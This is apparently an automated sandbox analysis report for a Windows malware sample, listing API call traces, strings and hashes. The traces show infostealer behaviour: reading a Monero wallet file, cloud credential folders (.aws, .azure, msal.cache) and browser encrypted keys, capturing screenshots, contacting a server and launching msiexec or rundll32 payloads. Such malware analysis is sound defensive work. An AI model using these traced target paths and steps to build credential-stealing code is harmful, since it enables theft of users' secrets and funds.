                              • Part of subcall function 00ECA820: lstrlen.KERNEL32(00EB4F05,?,?,00EB4F05,00ED0DDE), ref: 00ECA82B
                              • Part of subcall function 00ECA820: lstrcpy.KERNEL32(00ED0DDE,00000000), ref: 00ECA885
                            • lstrlen.KERNEL32(?), ref: 00EBD32A
                            • lstrlen.KERNEL32(?), ref: 00EBD339
                              • Part of subcall function 00ECAA70: StrCmpCA.SHLWAPI(00A98A48,00EBA7A7,?,00EBA7A7,00A98A48), ref: 00ECAA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 00EBD3B4
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: f8d61afc0a2446475862a7f6bc27cdcb79c24d991f130d74b6648af94cae9ea5
                            • Instruction ID: 53cf48a9ece38414bab9895a49817cf266ac3847dc25900557aa16f679be6c23
                            • Opcode Fuzzy Hash: f8d61afc0a2446475862a7f6bc27cdcb79c24d991f130d74b6648af94cae9ea5
                            • Instruction Fuzzy Hash: 66E11172910108ABCB18EBA0DE9AEEE73B8BF54304F14516DF506B7191DE366A07CB61
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00A9C630,00000000,?,00ED144C,00000000,?,?), ref: 00EBCA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00EBCA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00EBCA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EBCAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EBCAD9
                            • StrStrA.SHLWAPI(?,00A9C6F0,00ED0B52), ref: 00EBCAF7
                            • StrStrA.SHLWAPI(00000000,00A9C678), ref: 00EBCB1E
                            • StrStrA.SHLWAPI(?,00A9D580,00000000,?,00ED1458,00000000,?,00000000,00000000,?,00A98A18,00000000,?,00ED1454,00000000,?), ref: 00EBCCA2
                            • StrStrA.SHLWAPI(00000000,00A9D660), ref: 00EBCCB9
                              • Part of subcall function 00EBC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EBC871
                              • Part of subcall function 00EBC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EBC87C
                            • StrStrA.SHLWAPI(?,00A9D660,00000000,?,00ED145C,00000000,?,00000000,00A989D8), ref: 00EBCD5A
                            • StrStrA.SHLWAPI(00000000,00A98888), ref: 00EBCD71
                              • Part of subcall function 00EBC820: lstrcat.KERNEL32(?,00ED0B46), ref: 00EBC943
                              • Part of subcall function 00EBC820: lstrcat.KERNEL32(?,00ED0B47), ref: 00EBC957
                              • Part of subcall function 00EBC820: lstrcat.KERNEL32(?,00ED0B4E), ref: 00EBC978
                            • lstrlen.KERNEL32(00000000), ref: 00EBCE44
                            • CloseHandle.KERNEL32(00000000), ref: 00EBCE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: 1f32e48065eabc826a33a4aa7e6ee0dafdd24d57ccd74cb6e5f576807145fbd0
                            • Instruction ID: 2e0a8d90ae55402fc6b1a921b8dfc4254f9c327726d1c484e9c5d0b8ce45a0ad
                            • Opcode Fuzzy Hash: 1f32e48065eabc826a33a4aa7e6ee0dafdd24d57ccd74cb6e5f576807145fbd0
                            • Instruction Fuzzy Hash: A5E1097290010CABDB18EBA0DD96FEEB7B8AF54304F04516DF10677191EE366A4BCB61
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • RegOpenKeyExA.ADVAPI32(00000000,00A9A1C0,00000000,00020019,00000000,00ED05B6), ref: 00EC83A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EC8426
                            • wsprintfA.USER32 ref: 00EC8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EC847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC8499
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 5a425601a888b58353ff7d552e37e760453760e04c19ae4e80d72fec96f3a42d
                            • Instruction ID: 43a35f07c571ba4ca774858669456dbbc773462ebce4397c17c2b5f1e8e40e37
                            • Opcode Fuzzy Hash: 5a425601a888b58353ff7d552e37e760453760e04c19ae4e80d72fec96f3a42d
                            • Instruction Fuzzy Hash: 0E811C7291011C9BDB28DB54CE95FEAB7B8FB48704F00929DE109A7140DF766A86CF94
                            APIs
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00EC4DCD
                              • Part of subcall function 00EC4910: wsprintfA.USER32 ref: 00EC492C
                              • Part of subcall function 00EC4910: FindFirstFileA.KERNEL32(?,?), ref: 00EC4943
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00EC4E59
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED0FDC), ref: 00EC4971
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED0FE0), ref: 00EC4987
                              • Part of subcall function 00EC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EC4B7D
                              • Part of subcall function 00EC4910: FindClose.KERNEL32(000000FF), ref: 00EC4B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EC4EE5
                              • Part of subcall function 00EC4910: wsprintfA.USER32 ref: 00EC49B0
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED08D2), ref: 00EC49C5
                              • Part of subcall function 00EC4910: wsprintfA.USER32 ref: 00EC49E2
                              • Part of subcall function 00EC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00EC4A1E
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,00A9E400), ref: 00EC4A4A
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,00ED0FF8), ref: 00EC4A5C
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,?), ref: 00EC4A70
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,00ED0FFC), ref: 00EC4A82
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,?), ref: 00EC4A96
                              • Part of subcall function 00EC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00EC4AAC
                              • Part of subcall function 00EC4910: DeleteFileA.KERNEL32(?), ref: 00EC4B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: bcbc459ecc7340ab647c76efb89eb66c79b5ed470c38c711614abc564224bdcf
                            • Instruction ID: 9964f1b418c49128ccc79f0b411f8a8ea52d7cf5884bd5fe082b6c034c5ea1eb
                            • Opcode Fuzzy Hash: bcbc459ecc7340ab647c76efb89eb66c79b5ed470c38c711614abc564224bdcf
                            • Instruction Fuzzy Hash: C041B6BAA4030867C720F770ED57FED3778AB64700F405498B189B61C1EDB55BCA8BA2
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EC906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 2e64f25cb5614e449c45859c19a2551e982609e232547062a827499123e9df17
                            • Instruction ID: 28d0b94713fc3744cbcb3604173b4e491ebd956d79d1dc5acc784f5dea237c7c
                            • Opcode Fuzzy Hash: 2e64f25cb5614e449c45859c19a2551e982609e232547062a827499123e9df17
                            • Instruction Fuzzy Hash: E071ED75A10208EBDB14DFE4D999FEEB7B8BF48700F10850CF55AA7284DB79A905CB60
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC31C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC34EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: b4f22980d4fd993d62a1a64bceca3a990954b878a41b6912f20d79c2437f337e
                            • Instruction ID: 61a7f46d67ea1f3c57be165e26a5e2b12bc3a992db622e94f70dc100c6d37a0d
                            • Opcode Fuzzy Hash: b4f22980d4fd993d62a1a64bceca3a990954b878a41b6912f20d79c2437f337e
                            • Instruction Fuzzy Hash: 84122D7280010C9BDB18EBA0DE96FEDB7B8AF14304F48516DE50676191EF362B4BCB61
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB6280: InternetOpenA.WININET(00ED0DFE,00000001,00000000,00000000,00000000), ref: 00EB62E1
                              • Part of subcall function 00EB6280: StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6303
                              • Part of subcall function 00EB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB6335
                              • Part of subcall function 00EB6280: HttpOpenRequestA.WININET(00000000,GET,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB6385
                              • Part of subcall function 00EB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EB63BF
                              • Part of subcall function 00EB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB63D1
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC5318
                            • lstrlen.KERNEL32(00000000), ref: 00EC532F
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00EC5364
                            • lstrlen.KERNEL32(00000000), ref: 00EC5383
                            • lstrlen.KERNEL32(00000000), ref: 00EC53AE
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 94fb2801b7f4cb30220830ef7011915447ea4ec32544eba640f8fb21423b0a69
                            • Instruction ID: 4c72278dcd7af9dd4d883d92ea4ea1515536d2677a83a231b808379b537b99a8
                            • Opcode Fuzzy Hash: 94fb2801b7f4cb30220830ef7011915447ea4ec32544eba640f8fb21423b0a69
                            • Instruction Fuzzy Hash: 7251DB3291014C9BCB18EF60CA96FEE77B9AF50304F54502CE41A7A591DF366B47CB62
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 7aa155491374355df0c5c3a58b9d417a675ea81579a6d888345e71fc6e991fbd
                            • Instruction ID: 748c4ba1597fd083824219f42cc019ac7b33edccfcad39ef256abb72ff5709c4
                            • Opcode Fuzzy Hash: 7aa155491374355df0c5c3a58b9d417a675ea81579a6d888345e71fc6e991fbd
                            • Instruction Fuzzy Hash: DEC1B6B690020D9BCB14EF60DE89FEA73B8BB54304F0445ADF50A77141DA36AA86CF91
                            APIs
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC42EC
                            • lstrcat.KERNEL32(?,00A9DDD0), ref: 00EC430B
                            • lstrcat.KERNEL32(?,?), ref: 00EC431F
                            • lstrcat.KERNEL32(?,00A9C720), ref: 00EC4333
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EC8D90: GetFileAttributesA.KERNEL32(00000000,?,00EB1B54,?,?,00ED564C,?,?,00ED0E1F), ref: 00EC8D9F
                              • Part of subcall function 00EB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EB9D39
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                              • Part of subcall function 00EC93C0: GlobalAlloc.KERNEL32(00000000,00EC43DD,00EC43DD), ref: 00EC93D3
                            • StrStrA.SHLWAPI(?,00A9DC20), ref: 00EC43F3
                            • GlobalFree.KERNEL32(?), ref: 00EC4512
                              • Part of subcall function 00EB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9AEF
                              • Part of subcall function 00EB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B01
                              • Part of subcall function 00EB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9B2A
                              • Part of subcall function 00EB9AC0: LocalFree.KERNEL32(?,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC44A3
                            • StrCmpCA.SHLWAPI(?,00ED08D1), ref: 00EC44C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00EC44D2
